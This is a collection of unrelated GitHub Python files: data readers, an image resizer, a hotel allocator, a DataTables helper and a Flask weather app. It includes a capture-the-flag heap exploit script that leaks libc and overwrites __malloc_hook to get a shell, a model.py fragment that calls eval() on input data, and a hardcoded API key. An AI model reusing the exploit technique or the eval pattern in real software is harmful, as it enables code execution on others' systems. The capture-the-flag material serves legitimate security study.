\n \"\"\"\n \n #Using the model using sagemaker.\n # ENDPOINT_NAME = os.environ['ENDPOINT_NAME']\n # runtime= boto3.client('runtime.sagemaker')\n # print (f\"Attempting to predict using {ENDPOINT_NAME}\")\n # response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,\n # ContentType='text/csv',\n # Body= payload)\n # result = json.loads(response['Body'].read().decode())\n # print (f\"Predictions Generated \\n {result}\")\n # result_array = result.items()\n \n result_array = eval(dataInput)\n #creating insightFile in the lambda temporary folder\n df = pandas.DataFrame(result_array)\n insightsDataFileLocation = f\"/tmp/{jobID}-insights.csv\"\n df.to_csv(insightsDataFileLocation)\n return insightsDataFileLocation\n","repo_name":"NaiduVeeraVishnuVardhan/BreastCancerService","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25331205944","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 12 22:09:19 2019\r\n\r\n@author: study\r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef readbinFile(filename):\r\n byte_num = 504\r\n interval = 168000\r\n tol = 20\r\n\r\n blk_num = 0\r\n last_timetag = 0\r\n err_flag=False\r\n\r\n with open(filename, \"rb\") as f:\r\n while True:\r\n block=f.read(512)\r\n if not block:\r\n break\r\n else:\r\n blk_num=blk_num+1\r\n count=int.from_bytes(block[0:2], byteorder=\"little\", signed=False)\r\n if count != byte_num:\r\n print(\"Incorrect number of bytes in Block: \", blk_num);\r\n err_flag=True\r\n \r\n overrun=int.from_bytes(block[2:4], byteorder=\"little\", signed=False)\r\n if overrun:\r\n print(\"Overrun error at Block: \", blk_num, overrun)\r\n err_flag=True\r\n \r\n timetag=int.from_bytes(block[4:8], byteorder=\"little\", signed=False)\r\n if blk_num>=2:\r\n time_diff = timetag-last_timetag\r\n if time_diff>(interval+tol) or time_diff<(interval-tol):\r\n print(\"Timetage error in Block: \", blk_num, time_diff)\r\n err_flag=True\r\n \r\n last_timetag = timetag\r\n \r\n # remove the last block\r\n num=blk_num*21\r\n data = np.zeros((num, 12))\r\n n=0\r\n\r\n with open(filename, \"rb\") as f:\r\n while True:\r\n block=f.read(512)\r\n if not block:\r\n break\r\n else:\r\n for k in range(21):\r\n m=8+k*24\r\n for j in range(12):\r\n p=m+j*2\r\n data[n, j]=int.from_bytes(block[p:p+2], byteorder=\"big\", signed=True)\r\n n=n+1\r\n \r\n return err_flag, data\r\n \r\n\r\nerr_flag, sensordata = readbinFile(\"sensor00.bin\") \r\n\r\nnp.savetxt(\"sensor00.txt\", data, fmt='%5d', delimiter=' ') ","repo_name":"TreeKangaroo/imu-gait-analysis","sub_path":"KneeAngle/readbindata.py","file_name":"readbindata.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"42540448489","text":"# Imports\nimport os\nimport glob\nimport progressbar\nimport cv2\n\nimport config\n\n\n# Check if the raw_images directory exists\nif not os.path.exists(config.RAW_IMAGES_DIR):\n print(\"Raw images directory: No\")\nelse:\n print(\"Raw images directory: Yes\")\n\n\nif not os.path.exists(config.RESIZED_IMAGES_DIR):\n print(\"Resized images directory: No\")\n os.makedirs(config.RESIZED_IMAGES_DIR)\n print(\"Create resized images directory: Yes\")\n\nelse:\n print(\"Resized images directory: Yes\")\n\n\n# Get the names of all files in the raw_images directory\nfile_names = glob.glob(os.path.join(config.RAW_IMAGES_DIR, 
\"*.{}\".format(config.IMAGE_EXTENSION)))\nprint(\"Files in raw images directory: {}\".format(len(file_names)))\n\nbar = progressbar.ProgressBar(maxval=len(file_names), widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])\nbar.start()\nprint(\"Resizing images:-\")\n\n# Loop through the images and resize the images\nfor i, filename in enumerate(file_names):\n img = cv2.imread(filename)\n img_resized = cv2.resize(img, config.RESIZE_DIMS)\n new_filename = \"{}.{}\".format(str(i), config.IMAGE_EXTENSION )\n new_filepath = os.path.join(config.RESIZED_IMAGES_DIR, new_filename)\n cv2.imwrite(new_filepath, img_resized)\n bar.update(i + 1)\nbar.finish()\n\nprint(\"Saved images to: {}\".format(config.RESIZED_IMAGES_DIR))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nikhilbaby/custom-object-detector","sub_path":"resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7434097939","text":"import pandas as pd\nimport numpy as np\n\nclass RandomHotelAllocator:\n def __init__(self, hotelsdata, guestdata, preferencesdata):\n self.hotelsdata = hotelsdata\n self.guestdata = guestdata\n self.preferencesdata = preferencesdata\n self.allocation = pd.DataFrame(columns=['guest_id', 'hotel_id', 'satisfaction_percentage', 'paid_price'])\n\n def calculate_satisfaction_percentage(self, guest_id, hotel_id):\n guest_preferences = self.preferencesdata[self.preferencesdata['guest'] == guest_id].reset_index()\n\n if guest_preferences.empty:\n return 100\n\n is_hotel_one_of_preferred = np.isin(hotel_id, guest_preferences['hotel'].values)\n\n if is_hotel_one_of_preferred.any():\n index_of_preference = np.argmax(guest_preferences['hotel'].values == hotel_id)\n guest_preferences_count = len(guest_preferences)\n return round(((guest_preferences_count - index_of_preference) / guest_preferences_count) * 100)\n else:\n return 0\n\n def allocate_random_hotel(self, guest_id, guest_row):\n available_hotels = self.hotelsdata[self.hotelsdata['rooms'] > 0]\n if available_hotels.empty:\n return None\n\n random_available_hotel_id = np.random.choice(available_hotels.index)\n random_available_hotel_row = available_hotels.loc[random_available_hotel_id]\n random_available_hotel_row['rooms'] -= 1\n\n paid_price_coefficient = 1 - guest_row['discount']\n paid_price = random_available_hotel_row['price'] * paid_price_coefficient\n\n satisfaction = self.calculate_satisfaction_percentage(guest_id, random_available_hotel_id)\n\n return [guest_id, random_available_hotel_id, satisfaction, paid_price]\n\n def get_random_allocation(self):\n shuffled_guests = self.guestdata.sample(frac=1, random_state=42)\n for guest_id, guest_row in shuffled_guests.iterrows():\n allocation_entry = self.allocate_random_hotel(guest_id, guest_row)\n if allocation_entry is not None:\n self.allocation.loc[len(self.allocation)] = allocation_entry\n\n return self.allocation","repo_name":"sergiopicascia/dscoding-projects","sub_path":"Alina.Imansakipova/hotel-project/hotel_project/final/random_allocation_class.py","file_name":"random_allocation_class.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"72638617336","text":"from pwn import *\nfrom LibcSearcher import *\n\nimport utils\n\ncontext.arch = 'amd64'\ncontext.log_level = 'debug'\n\ntarget = remote('node4.buuoj.cn', 26614)\nelf = 
ELF('../roarctf_2019_easy_pwn')\nlibc = ELF('/home/kali/glibc-all-in-one/libs/2.23-amd64/libc-2.23.so')\n\n\n# Utility functions\ndef allocate(size):\n    target.sendlineafter('choice: ', '1')\n    target.sendlineafter('size: ', str(size))\n    target.recvuntil('the index of ticket is')\n\n\ndef edit(index, size, content):\n    target.sendlineafter('choice: ', '2')\n    target.sendlineafter('index: ', str(index))\n    target.sendlineafter('size: ', str(size))\n    target.sendafter('content: ', content)\n\n\ndef free(index):\n    target.sendlineafter('choice: ', '3')\n    target.sendlineafter('index: ', str(index))\n\ndef show(index):\n    target.sendlineafter('choice: ', '4')\n    target.sendlineafter('index: ', str(index))\n\n# We know that the size and valid bit are stored in a different location.\n# A global heap array stores the pointer to the heap.\n# Using an off-by-one and an irregular heap size, we can modify\n# one byte of the next block.\nallocate(0x18) # 0\nallocate(0x10) # 1\nallocate(0x60) # 2\nallocate(0x60) # 3\n\nedit(0, 0x18 + 10, b'a' * 0x18 + b'\\x91')\nfree(1)\n\n# Chunk split happened here. So fd and bk will be placed inside chunk 2.\nallocate(0x10) # 1\nshow(2)\n\nmain_arena = u64(target.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - 88\nmalloc_hook = main_arena - 0x10\nlibc_base = malloc_hook - libc.sym['__malloc_hook']\n\nallocate(0x60) # 4 but controls 2 (overlapping chunk).\n\none_gadget = 0x4526a + libc_base\n\nfree(2)\nfree(3)\nfree(4)\n\nallocate(0x60) # 2\nedit(2, 8, p64(libc_base + libc.sym['__malloc_hook'] - 0x23))\nallocate(0x60) # 3\nallocate(0x60) # 4\nallocate(0x60) # 5\n\npayload = b'a' * 0xb + p64(one_gadget) + \\\n    p64(libc_base + libc.sym['__realloc_hook'] + 4)\nedit(5, len(payload), payload)\n\nallocate(0x10)\n\ntarget.interactive()\n","repo_name":"hiroki-chen/PWN-scripts","sub_path":"roarctf_2019_easy_pwn.py","file_name":"roarctf_2019_easy_pwn.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"23423750977","text":"import torch.nn as nn\nimport torch\n\nclass RMSELoss(nn.Module):\n    def __init__(self):\n        super().__init__()\n        self.mse = nn.MSELoss()\n        \n    def forward(self,pred,true):\n        # .float() returns a new tensor, so the results must be reassigned\n        pred = pred.float()\n        true = true.float()\n        return torch.sqrt(self.mse(pred,true)).float()\n\n","repo_name":"gonzo3832/202110_PetFinder","sub_path":"src/criterion.py","file_name":"criterion.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"16785291055","text":"import curses\nimport sys\nimport random\nimport time\n\nfrom os import listdir\nfrom os.path import isfile, join\n\nclass FileListing:\n    DOWN = 1\n    UP = -1\n    SPACE_KEY = 32\n    ESC_KEY = 27\n\n    PREFIX_SELECTED = '[X]'\n    PREFIX_DESELECTED = '[_]'\n\n    outputLines = []\n    screen = None\n\n    mypath = \".\"\n\n    def __init__(self):\n        self.screen = curses.initscr()\n        curses.noecho()\n        curses.cbreak()\n        self.screen.keypad(1)\n        self.screen.border(0)\n        self.topLineNum = 0\n        self.highlightLineNum = 0\n        self.markedLineNums = []\n        self.getOutputLines()\n        (self.maxY, self.maxX) = self.screen.getmaxyx()\n\n    def run(self):\n        c = \"\"\n        while c not in [ord(\"q\"), self.ESC_KEY]:\n            self.displayScreen()\n            c = self.screen.getch()\n            if c == curses.KEY_UP:\n                self.updown(self.UP)\n            elif c == curses.KEY_DOWN:\n                self.updown(self.DOWN)\n            elif c == self.SPACE_KEY:\n                self.markLine()\n\n        return [self.mypath+self.outputLines[i] for i in self.markedLineNums]\n\n    def markLine(self):\n        linenum 
= self.topLineNum + self.highlightLineNum\n        if linenum in self.markedLineNums:\n            self.markedLineNums.remove(linenum)\n        else:\n            self.markedLineNums.append(linenum)\n\n    def getOutputLines(self):\n        self.outputLines = [ f for f in listdir(self.mypath) if isfile(join(self.mypath,f)) ]\n        self.nOutputLines = len(self.outputLines)\n\n    def displayScreen(self):\n        # clear screen\n        self.screen.clear()\n        self.screen.border(0)\n\n        # now paint the rows\n        top = self.topLineNum\n        bottom = self.topLineNum+curses.LINES\n        for (index,line,) in enumerate(self.outputLines[top:bottom]):\n            linenum = self.topLineNum + index\n            if linenum in self.markedLineNums:\n                prefix = self.PREFIX_SELECTED\n            else:\n                prefix = self.PREFIX_DESELECTED\n\n            line = '%s %s' % (prefix, line,)\n\n            # highlight current line\n            if index != self.highlightLineNum:\n                self.screen.addstr(index+2, 4, line)\n            else:\n                self.screen.addstr(index+2, 4, line, curses.A_BOLD)\n\n        # Draw the bottom border and help line of the window\n        for u in range(self.maxX):\n            if u == 0:\n                self.screen.addch(self.maxY - 3, u, curses.ACS_LTEE)\n            elif u == self.maxX - 1:\n                self.screen.addch(self.maxY - 3, u, curses.ACS_RTEE)\n            else:\n                self.screen.addch(self.maxY - 3, u, curses.ACS_HLINE)\n        self.screen.addstr(self.maxY - 2, 1, '(Esc|q) - Back')\n\n        self.screen.refresh()\n\n    # move highlight up/down one line\n    def updown(self, increment):\n        nextLineNum = self.highlightLineNum + increment\n\n        # paging\n        if increment == self.UP and self.highlightLineNum == 0 and self.topLineNum != 0:\n            self.topLineNum += self.UP\n            return\n        elif increment == self.DOWN and nextLineNum == curses.LINES and (self.topLineNum+curses.LINES) != self.nOutputLines:\n            self.topLineNum += self.DOWN\n            return\n\n        # scroll highlight line\n        if increment == self.UP and (self.topLineNum != 0 or self.highlightLineNum != 0):\n            self.highlightLineNum = nextLineNum\n        elif increment == self.DOWN and (self.topLineNum+self.highlightLineNum+1) != self.nOutputLines and self.highlightLineNum != curses.LINES:\n            self.highlightLineNum = nextLineNum\n","repo_name":"c4software/simple_remote_gui","sub_path":"file_listing.py","file_name":"file_listing.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"}
+{"seq_id":"15810308715","text":"import numpy as np\nimport pytest\nimport paddle.inference\n\nimport bentoml\n\nfrom .test_paddle_impl import test_df\n\n\ndef test_paddlepaddle_load_runner(train_paddle_model):\n    tag = bentoml.paddle.save(\"linear_model\", train_paddle_model)\n    info = bentoml.models.get(tag)\n    runner = bentoml.paddle.load_runner(tag)\n\n    assert info.tag in runner.required_models\n    assert runner.num_replica == 1\n\n    input_data = test_df.to_numpy().astype(np.float32)\n    assert runner.run_batch(input_data) == [np.array([0.90038574], dtype=np.float32)]\n    assert isinstance(runner._model, paddle.inference.Predictor)\n\n\ndef test_paddlepaddle_runner_from_paddlehub():\n    test_text = [\"这家餐厅很好吃\", \"这部电影真的很差劲\"]\n    tag = bentoml.paddle.import_from_paddlehub(\"senta_bilstm\")\n    runner = bentoml.paddle.load_runner(tag, infer_api_callback=\"sentiment_classify\")\n    results = runner.run_batch(None, texts=test_text, use_gpu=False, batch_size=1)\n    assert results[0][\"positive_probs\"] == 0.9407\n    assert results[1][\"positive_probs\"] == 0.02\n\n\n@pytest.mark.gpus\ndef test_paddlepaddle_load_runner_gpu(train_paddle_model):\n    \"\"\"\n    tag = bentoml.paddle.save(\"linear_model\", train_paddle_model)\n    info = bentoml.models.get(tag)\n    runner = bentoml.paddle.load_runner(\n        
tag,\n        enable_gpu=True,\n        device=\"gpu:0\",\n    )\n\n    assert info.tag in runner.required_models\n    assert runner.num_replica == bentoml.paddle.device_count()\n\n    input_data = test_df.to_numpy().astype(np.float32)\n    _ = runner.run_batch(input_data)\n    assert isinstance(runner._model, paddle.inference.Predictor)\n    assert runner._runner_config.use_gpu() is True\n    \"\"\"\n","repo_name":"jung235/BentoML","sub_path":"tests/integration/frameworks/paddle/test_paddle_runner.py","file_name":"test_paddle_runner.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"22"}
+{"seq_id":"30072769243","text":"import torch\n\nfrom torch.distributions import Categorical\nfrom torch import nn\nfrom garage.torch.modules import MLPModule\n\nclass CategoricalMLPModule(nn.Module):\n\n    def __init__(self,\n                 input_dim,\n                 output_dim,\n                 hidden_sizes=(64, 64),\n                 hidden_nonlinearity=torch.tanh,\n                 hidden_w_init=nn.init.xavier_uniform_,\n                 hidden_b_init=nn.init.zeros_,\n                 output_w_init=nn.init.xavier_uniform_,\n                 output_b_init=nn.init.zeros_,\n                 layer_normalization=False):\n        super().__init__()\n\n        self._input_dim = input_dim\n        self._hidden_sizes = hidden_sizes\n        self._action_dim = output_dim\n        self._hidden_nonlinearity = hidden_nonlinearity\n        self._hidden_w_init = hidden_w_init\n        self._hidden_b_init = hidden_b_init\n        self._output_w_init = output_w_init\n        self._output_b_init = output_b_init\n        self._layer_normalization = layer_normalization\n        # Set the output nonlinearity to None, as we need raw logits for the straight-through Gumbel-softmax estimator\n        self._output_nonlinearity = None\n\n        self.categorical_logits_module = MLPModule(\n            input_dim= self._input_dim,\n            output_dim = self._action_dim,\n            hidden_sizes=self._hidden_sizes,\n            hidden_nonlinearity=self._hidden_nonlinearity,\n            hidden_w_init=self._hidden_w_init,\n            hidden_b_init=self._hidden_b_init,\n            output_nonlinearity=None,\n            output_w_init=self._output_w_init,\n            output_b_init=self._output_b_init,\n            layer_normalization=self._layer_normalization\n        )\n\n    def forward(self, inputs):\n        logits = self.categorical_logits_module(inputs)\n        return Categorical(logits=logits)\n","repo_name":"MkuuWaUjinga/DeepMDP-SSL4RL","sub_path":"deepmdp/garage_mod/policies/categorical_mlp_module.py","file_name":"categorical_mlp_module.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"}
+{"seq_id":"5467683640","text":"# DataTables server-side processing\n# @author : Ahmad Fajar\n# supports: ordering by single or multiple columns, searching in a specific column\n# limitations: no global search across all columns, no regex\n# how to use:\n# first, the client side should have these two options in your DataTables init script:\n# serverSide : true,\n# columns: [\n#   { 'name' : 'dbFieldName/specificKeyFromResponse', 'data' : 'dbFieldName/specificKeyFromResponse/YouCreateCallbackinHere' }\n# ]\n\n# then we create an instance of the Datatables class\n# here we pass all the DataTables data from request.GET to the `attributes` argument\n# and the model class to the `queryset` argument, like this:\n# DT_Instance = Datatables(attributes=request.GET, queryset=ModelClass)\n\n# then we call the filters function and fetch the query result like this:\n# data, records_filtered, records_total = DT_Instance.filters().getQueryset()\n# and then we return the response to the client side, or we can transform the data first and then return it\n# return JsonResponse({\n#     
\"draw\": DT_Instance.getDraw(),\n# \"data\" : list(datas.values('columnA', 'columnB', 'etc..')),\n# \"recordsTotal\": records_total,\n# \"recordsFiltered\": records_filtered\n# }, safe=False)\n\n\n# important NOTE :\n# the default filter condition is just like this `column=value`\n# so if we have a special condition like `column__lte` or etc,\n# we can create a function to filter with condition what we want like this:\n# in this case we want to filter the date data by month and day\n# def monthday_filter(value, column='')\n# mn, day = value.split('-')\n# NOTE : the return function should be Boolean False or array 2 dimension `[[condition, value], etc...]`\n# if we return False the custom function will not be executed\n# return [['%s__month'%(column), mn], ['%s__day'%(column), day]]\n\n# then we assign the function into custom_condition args and we can also add an extra filter in filter function like this\n# custom_condition = { 'nametheDateField' : monthday_filter }\n# DT_Instance.filter(filters={'a' : 'a', 'b' :'b'}, custom_condition=custom_condition)\n#\n# then we get the query result with data that already filtered by condition what we want from datatables and what we do previously\n# datas, records_filtered, records_total = DI_Instance.getQueryset()\n\nclass Datatables():\n # attributes format from datatables will be like this:\n # {\n # 'draw': [''],\n # 'columns[0-n][data]': ['0'],\n # 'columns[0-n][name]': [''],\n # 'columns[0-n][searchable]': ['true' or 'false'],\n # 'columns[0-n][orderable]': ['true' or 'false'],\n # 'columns[0-n][search][value]': [''],\n # 'columns[0-n][search][regex]': ['true' or 'false']\n # 'order[0][column]': ['2'],\n # 'order[0][dir]': ['desc'],\n # 'start': ['0'],\n # 'length': ['100'],\n # 'search[value]': [''],\n # 'search[regex]': ['false']\n # }\n # we get raw attributes from request.GET\n rawAttributes = {}\n\n # we want the attribute from datatables more readable\n cleanAttributes = {'columns' : [], 'order' : [], 'start' : 0, 'length' : 10, 'search' : {'value' : '', 'regex' : 'false'}}\n\n # direction ordering\n direction_order = {\n 'desc' : '-',\n 'asc' : ''\n }\n\n # data from database\n queryset = None\n\n def __init__(self, attributes={}, queryset=None):\n # we pass request.GET to rawAttributes\n self.rawAttributes = attributes\n # queryset is the model object\n self.queryset = queryset\n\n # we normalize the attributes first\n if queryset:\n self.normalizeAttributes()\n\n def normalizeAttributes(self):\n # reset order and columns\n self.cleanAttributes['order'] = []\n self.cleanAttributes['columns'] = []\n\n i = 0\n loop = True\n while loop:\n # first we normalize each column attributes\n try:\n name = self.rawAttributes['columns[%d][name]'%(i)]\n data = {\n 'data' : self.rawAttributes['columns[%d][data]'%(i)],\n 'name' : name,\n 'searchable' : self.rawAttributes['columns[%d][searchable]'%(i)],\n 'orderable' : self.rawAttributes['columns[%d][orderable]'%(i)],\n 'search' : {\n 'value' : self.rawAttributes['columns[%d][search][value]'%(i)],\n 'regex' : self.rawAttributes['columns[%d][search][regex]'%(i)]\n }\n }\n self.cleanAttributes['columns'].append(data)\n i+=1\n except Exception as e:\n loop = False\n\n i = 0\n loop = True\n while loop:\n # normalize order\n try:\n self.cleanAttributes['order'].append({\n 'column' : self.rawAttributes['order[%d][column]'%(i)],\n 'dir' : self.rawAttributes['order[%d][dir]'%(i)]\n })\n i+=1\n except Exception as e:\n loop = False\n\n # normalize all global attributes\n self.cleanAttributes['start'] = 
int(self.rawAttributes['start'])\n        self.cleanAttributes['draw'] = self.rawAttributes['draw']\n        self.cleanAttributes['length'] = int(self.rawAttributes['length'])\n        self.cleanAttributes['search']['value'] = self.rawAttributes['search[value]']\n        self.cleanAttributes['search']['regex'] = self.rawAttributes['search[regex]']\n\n    def globalFilter(self, filters, custom_orders, q_filters):\n        order_by = []\n        # order by\n        for order in self.cleanAttributes['order']:\n            column = self.cleanAttributes['columns'][int(order['column'])]['name']\n            try:\n                # a custom function can supply the ordering columns for this column\n                columns = custom_orders[column]()\n                if columns:\n                    for ccolumn in columns:\n                        ccolumn = self.direction_order[order['dir']] + ccolumn\n                        order_by.append(ccolumn)\n            except Exception as e:\n                column = self.direction_order[order['dir']] + column\n                if column not in order_by:\n                    order_by.append(column)\n\n        self.queryset = self.queryset.objects.order_by(*order_by).filter(**filters)\n\n        if q_filters and self.cleanAttributes['search']['value'] != '':\n            self.queryset = self.queryset.filter(q_filters(self.cleanAttributes['search']['value']))\n\n        return self\n\n    def filters(self, custom_condition={}, filters={}, custom_orders={}, globalSearch=False, q_filters=None):\n        if globalSearch:\n            return self.globalFilter(filters, custom_orders, q_filters)\n\n        order_by = []\n        # search\n        for column in self.cleanAttributes['columns']:\n            if column['search']['value'] != '':\n                value = column['search']['value']\n\n                # the default condition is just the name of the field\n                condition = column['name']\n                try:\n                    # a custom function can build the filter condition for this column\n                    conditions = custom_condition[condition](value=value, column=condition)\n                    if conditions:\n                        for cn, val in conditions:\n                            filters[cn] = None if val == 'null' else val\n\n                except Exception as e:\n                    filters[condition] = None if value == 'null' else value\n\n        # order by\n        for order in self.cleanAttributes['order']:\n            column = self.cleanAttributes['columns'][int(order['column'])]['name']\n            try:\n                # a custom function can supply the ordering columns for this column\n                columns = custom_orders[column]()\n                if columns:\n                    for ccolumn in columns:\n                        ccolumn = self.direction_order[order['dir']] + ccolumn\n                        order_by.append(ccolumn)\n            except Exception as e:\n                column = self.direction_order[order['dir']] + column\n                if column not in order_by:\n                    order_by.append(column)\n\n        self.queryset = self.queryset.objects.order_by(*order_by).filter(**filters)\n\n        return self\n\n    def exclude(self, **filters):\n        self.queryset = self.queryset.exclude(**filters)\n        return self\n\n    # setter getter\n    def getQueryset(self, full=False):\n        querysetByRange = None\n        try:\n            querysetByRange = self.queryset[self.getStart():self.getEnd()]\n        except Exception as e:\n            pass\n        if not full:\n            return [querysetByRange, self.queryset.count(), len(querysetByRange)]\n        else:\n            return [self.queryset, self.queryset.count()]\n\n    def getAttributes(self, attribute=None):\n        if attribute:\n            attribute = self.cleanAttributes[attribute]\n        else:\n            attribute = self.cleanAttributes\n\n        return attribute\n\n    def getLength(self):\n        return self.cleanAttributes['length']\n\n    def getDraw(self):\n        return self.cleanAttributes['draw']\n\n    def getStart(self):\n        return self.cleanAttributes['start']\n\n    def getEnd(self):\n        return self.cleanAttributes['start'] + self.cleanAttributes['length']\n\n    def getOrders(self):\n        order_by = []\n        self.normalizeAttributes()\n        for order in self.cleanAttributes['order']:\n            column = 
self.cleanAttributes['columns'][int(order['column'])]['name']\n            column = self.direction_order[order['dir']] + column\n            if column not in order_by:\n                order_by.append(column)\n\n        return order_by\n\n    def getFilters(self, custom_condition={}):\n        self.normalizeAttributes()\n        filters = {}\n        # search\n        for column in self.cleanAttributes['columns']:\n            if column['search']['value'] != '':\n                value = column['search']['value']\n\n                # the default condition is just the name of the field\n                condition = column['name']\n                try:\n                    # a custom function can build the filter condition for this column\n                    conditions = custom_condition[condition](value=value, column=condition)\n                    if conditions:\n                        for cn, val in conditions:\n                            filters[cn] = None if val == 'null' else val\n\n                except Exception as e:\n                    filters[condition] = None if value == 'null' else value\n\n        return filters\n","repo_name":"ahmadfajar92/Django-Datatables-Projects","sub_path":"source/datatables.py","file_name":"datatables.py","file_ext":"py","file_size_in_byte":10724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"12366153764","text":"\"\"\"\nWrite a program that takes two numbers A and B as input\nand raises the number A to the integer power B using recursion.\n\"\"\"\n\ndef power_recursive(A, B):\n    # Base case: if the exponent is 0, the result is always 1.\n    if B == 0:\n        return 1\n\n    # Recursive case: decrease the exponent by 1 and call the function recursively.\n    # Then multiply the result by A.\n    result = A * power_recursive(A, B - 1)\n    print(f'{A} to the power {B} equals {result}')\n    return result\n\npower_recursive(4,6)","repo_name":"LDimak/PythonHomeWorks","sub_path":"HW05/Task01.py","file_name":"Task01.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"28833540120","text":"from _tools import *\nfrom collections import OrderedDict\n\nFIELDS_UI = OrderedDict()\n\n#------------------------------------------------------------------------\n# CONFIGURATION SECTION \nAPP_NAME = 'Reachability'\n\n# Variable names when displayed on the user interface\n# Create this dictionary in the same order that you want to display it\nFIELDS_UI = OrderedDict()\n#FIELDS_UI['Speed_Approach'] = 'Approach speed (mm/s)'\n#FIELDS_UI['Speed_Normal'] = 'Operation Speed (mm/s)'\nFIELDS_UI['ShowRobotPoses'] = 'Show Robot'\nFIELDS_UI['Unreachable_Timeout'] = 'Unreachable timeout (s)'\nFIELDS_UI['Range_TX'] = 'Translation X (m)'\nFIELDS_UI['Range_TY'] = 'Translation Y (m)'\nFIELDS_UI['Range_TZ'] = 'Translation Z (m)'\nFIELDS_UI['Range_RX'] = 'Rotation X (deg)'\nFIELDS_UI['Range_RY'] = 'Rotation Y (deg)'\nFIELDS_UI['Range_RZ'] = 'Rotation Z (deg)'\n\n\n# Station name to store\nSTATIONVAR_NAME = APP_NAME \n\nclass Settings(AppSettings):\n    \"\"\"Generic settings class to save and load settings from a RoboDK station and show methods in RoboDK\"\"\"\n    # List the variable names you would like to save and their default values\n    # Important: Try to avoid default None type!! 
\n # If None is used as default value it will attempt to treat it as a float and None = -1 \n # Variables that start with underscore (_) will not be saved\n #Speed_Approach = 200\n #Speed_Normal = 50 \n ShowRobotPoses = False\n Unreachable_Timeout = 2\n Range_TX = \"[0]\"\n Range_TY = \"[0]\"\n Range_TZ = \"[0]\"\n Range_RX = \"range(-120, 180, 60)\"\n Range_RY = \"range(-120, 180, 60)\"\n Range_RZ = \"[0]\" \n \n \n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------ \n def __init__(self):\n # customize the initialization section if needed\n super(Settings, self).__init__(STATIONVAR_NAME)\n self._FIELDS_UI = FIELDS_UI\n\n def CopyFrom(self, other):\n \"\"\"Copy settings from another instance\"\"\"\n attr = self.getAttribs()\n for a in attr:\n if hasattr(other, a):\n setattr(self,a, getattr(other, a))\n\n def SetDefaults(self):\n # List untouched variables for default settings\n list_untouched = []\n \n # save in local variables\n for var in list_untouched:\n exec('%s=self.%s' % (var,var))\n\n defaults = Settings()\n self.CopyFrom(defaults)\n\n # restore from local vars\n for var in list_untouched:\n exec('self.%s=%s' % (var,var))\n\n def ShowUI(self, windowtitle=APP_NAME, embed=False, wparent=None, callback_frame=None):\n # Show the UI for these settings including a custom frame to set the default settings\n def custom_frame(w):\n def set_defaults():\n w.destroy()\n self.SetDefaults()\n self.ShowUI(windowtitle=windowtitle, embed=embed, wparent=wparent, callback_frame=custom_frame)\n\n row = tk.Frame(w)\n b1 = tk.Button(row, text='Set defaults', command=set_defaults, width=8)\n b1.pack(side=tk.LEFT, padx=5, pady=5)\n\n #Creating the OK button\n #bhelper = tk.Button(row, text='OK', command=read_fields, width=8)\n #bhelper.pack(side=tk.RIGHT, padx=5, pady=5)\n\n row.pack(side=tk.TOP, fill=tk.X, padx=1, pady=1)\n\n super(Settings, self).ShowUI(windowtitle=windowtitle, embed=embed, wparent=wparent, callback_frame=custom_frame)\n\n\ndef runmain():\n # Read this app settings\n S = Settings()\n\n #if not S.Load():\n # print(\"Using default settings (loaded for the first time)\")\n \n S.Load()\n S.ShowUI()\n S.Save() \n \nif __name__ == \"__main__\":\n runmain()\n","repo_name":"terragord7/Plug-In-Interface","sub_path":"PluginAppLoader/Apps/Reachability/_config.py","file_name":"_config.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"73969702447","text":"from flask import Blueprint, render_template, request\nimport json\nimport requests\n\n\nviews = Blueprint('views', __name__)\n\n\n\n\n@views.route('/', methods=['GET'])\ndef home():\n return render_template(\"home.html\")\n\n\n@views.route('/predict_weather', methods=['POST', 'GET'])\ndef predict_weather():\n if request.method == 'POST':\n q = request.form['location']\n\n url = \"https://weatherapi-com.p.rapidapi.com/current.json\"\n\n querystring = {\"q\": q}\n\n headers = {\n \"X-RapidAPI-Key\": \"f2ff04fdf0mshaa1fd82cd7eaeadp1c25e9jsn17abd8162778\",\n \"X-RapidAPI-Host\": \"weatherapi-com.p.rapidapi.com\"\n }\n\n\n try:\n response = requests.request(\"GET\", 
